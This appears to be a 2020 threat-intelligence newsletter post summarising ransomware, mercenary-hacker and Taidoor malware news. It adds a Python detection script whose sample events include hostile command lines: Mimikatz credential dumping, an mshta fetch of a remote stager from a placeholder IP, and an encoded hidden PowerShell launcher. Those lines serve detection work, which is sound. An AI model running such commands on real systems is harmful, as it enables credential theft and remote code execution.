ShadowTalk Update – CWT pays ransom, data leaked for 900+ Pulse Secure Servers, EU issues first cyber sanctions

Digital Shadows Analyst Team
August 10, 2020 | 2 Min Read

In this week’s episode, Viktoria is joined by Kim, Dylan and Demelza to discuss:

  • Ransomware negotiations between CWT and its attackers
  • Impact and severity of the credentials leaked to a criminal forum for 900+ Pulse Secure enterprise VPN servers
  • Ghostwriter: an overview of a series of disinformation campaigns aligned with Russian security interests, covering observed activity and attribution
  • EU issues its first sanctions against Russian and Chinese cyber actors: impact, effectiveness and the reasoning behind them


Analysis reveals active attack server used by Maze affiliate

On 22 Jul 2020, analysis by security researchers revealed an active attack server used by a threat actor operating as an affiliate of the Maze ransomware operation. The affiliate reportedly gained initial access through a system with Remote Desktop Protocol (RDP) exposed to the Internet, then used that foothold to scan for other systems and map the network before distributing the Maze ransomware with an unnamed loader. The threat actor was observed using the following tools: GMER, Mimikatz, Metasploit, Cobalt Strike, PowerShell, AdFind, Koadic, and PowerShell Empire.

Cyber-mercenary group Deceptikons uncovered

On 29 Jul 2020, security researchers reported on the hacker-for-hire group "Deceptikons", which has provided hacking services for almost a decade. The cyber-mercenary group's targeting of commercial entities (specifically, targets not involved in government) is unusual for an APT group. Deceptikons was likely responsible for a 2019 spearphishing campaign against multiple European law firms, deploying PowerShell scripts and using modified shortcut (.lnk) files to compromise systems and execute a PowerShell backdoor. The group is not considered technically advanced, but its infrastructure and malware focus on gaining persistence on infected hosts.
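Neither item above publishes indicators, so the following is an added illustration, not code from the Digital Shadows post or from the researchers it summarizes: a Python triage pass over constructed process-creation events (Sysmon Event ID 1 style, flattened to JSON lines) keyed to the tooling named in the Maze and Deceptikons items. It flags AdFind-style LDAP queries from the network-mapping phase, Mimikatz module syntax, an mshta.exe stager fetched from a URL of the kind Koadic uses, an Empire-style launcher (hidden window plus encoded command), PowerShell spawned by explorer.exe with a hidden window (what a user opening a modified .lnk typically produces), and unrenamed copies of GMER, AdFind or Mimikatz. Every host name, path, IP address, timestamp and the indicator patterns themselves are assumptions made for this example; two of the samples are deliberately renamed binaries to show why command-line patterns catch more than filenames do.

```python
"""Triage constructed process-creation events for the tooling named in the two items above."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Constructed sample events (Sysmon Event ID 1 style, one JSON object per line).
# Hosts, paths, IPs and timestamps are invented for this example, not taken from the page.
SAMPLE_EVENTS = r"""
{"ts": "2020-07-20T09:21:44Z", "host": "WS-0114", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Users\\Public\\af.exe", "cmdline": "af.exe -f \"(objectcategory=computer)\" name operatingsystem dnshostname"}
{"ts": "2020-07-20T09:25:10Z", "host": "WS-0114", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Users\\Public\\m.exe", "cmdline": "m.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"}
{"ts": "2020-07-20T09:30:55Z", "host": "WS-0114", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta http://198.51.100.23:9999/x"}
{"ts": "2020-07-20T09:33:12Z", "host": "WS-0114", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Users\\Public\\gmer.exe", "cmdline": "gmer.exe"}
{"ts": "2020-07-21T11:02:18Z", "host": "LAP-0032", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ts": "2020-07-21T11:05:00Z", "host": "LAP-0032", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Notepad++\\notepad++.exe", "cmdline": "\"C:\\Program Files\\Notepad++\\notepad++.exe\" notes.txt"}
{"ts": "2020-07-21T11:07:31Z", "host": "SRV-DC01", "parent": "C:\\Windows\\System32\\services.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"}
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass(frozen=True)
class Rule:
    name: str
    why: str                               # the reported behaviour this rule is keyed to
    cmdline: Optional[re.Pattern] = None   # searched against the full command line
    image: Optional[re.Pattern] = None     # searched against the image basename
    parent: Optional[re.Pattern] = None    # searched against the parent image basename

    def matches(self, ev: dict) -> bool:
        checks = (
            (self.cmdline, ev.get("cmdline", "")),
            (self.image, basename(ev.get("image", ""))),
            (self.parent, basename(ev.get("parent", ""))),
        )
        return all(p is None or p.search(v) for p, v in checks)


# Indicator patterns are assumptions drawn from how these tools are commonly invoked,
# not from the post, which names the tools without publishing indicators.
RULES = [
    Rule("adfind_ldap_query", "AD enumeration (AdFind -f filter) during network mapping",
         cmdline=re.compile(r'-f\s+"?\(?objectcategory=', re.I)),
    Rule("mimikatz_module_call", "credential dumping via Mimikatz module::command syntax",
         cmdline=re.compile(r"\b(?:sekurlsa|lsadump|kerberos)::|privilege::debug", re.I)),
    Rule("mshta_remote_stager", "Koadic-style stager pulled by mshta.exe from a URL",
         image=re.compile(r"^mshta\.exe$"), cmdline=re.compile(r"https?://", re.I)),
    Rule("hidden_encoded_powershell", "Empire-style launcher: hidden window plus encoded command",
         image=re.compile(r"^powershell\.exe$"),
         cmdline=re.compile(r"(?=.*-w(?:indowstyle)?\s+hidden)(?=.*-e(?:c|nc|ncodedcommand)?\s+\S)", re.I)),
    Rule("explorer_spawned_hidden_powershell", "PowerShell from a user-opened file (e.g. modified .lnk)",
         parent=re.compile(r"^explorer\.exe$"), image=re.compile(r"^powershell\.exe$"),
         cmdline=re.compile(r"-w(?:indowstyle)?\s+hidden|-noni\b|-noninteractive", re.I)),
    Rule("known_tool_filename", "unrenamed copy of a tool from the reported kit",
         image=re.compile(r"^(?:adfind|gmer|mimikatz)\.exe$")),
]


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    rule: str
    why: str
    cmdline: str


def parse_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def triage(events: Iterable[dict]) -> list[Finding]:
    """Run every rule over every event; an event may produce several findings."""
    findings: list[Finding] = []
    for ev in events:
        for rule in RULES:
            if rule.matches(ev):
                findings.append(Finding(ev["ts"], ev["host"], rule.name, rule.why, ev["cmdline"]))
    return findings


def rules_fired_by_host(findings: Iterable[Finding]) -> dict[str, list[str]]:
    """Group fired rules per host in event order; several distinct rules on one host is the stronger lead."""
    out: dict[str, list[str]] = {}
    for f in findings:
        out.setdefault(f.host, []).append(f.rule)
    return out


if __name__ == "__main__":
    for f in triage(parse_events(SAMPLE_EVENTS)):
        print(f"{f.ts} {f.host:<9} {f.rule:<36} {f.why}")
```

Run as-is it flags four findings on WS-0114 (the chain of AD enumeration, credential dumping, stager and an unrenamed GMER) and two on LAP-0032, while the benign Notepad++ launch and the scheduled backup script on SRV-DC01 stay silent. The renamed af.exe and m.exe samples are matched only by their command lines, which is the design point: a filename list alone would have missed the two highest-value events.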

US government bodies warn of Chinese Taidoor malware

On 03 Aug 2020, the US Department of Homeland Security, Department of Defense, and FBI published a joint alert on a malware variant used by threat actors linked to the People's Republic of China. According to the agencies, the "Taidoor" remote access trojan (RAT) has been used in attacks since 2008 and has specifically targeted entities with an interest in Taiwan. The malware was reportedly distributed through spearphishing emails carrying malicious attachments.

Weekly Intelligence Summary 07 August 2020
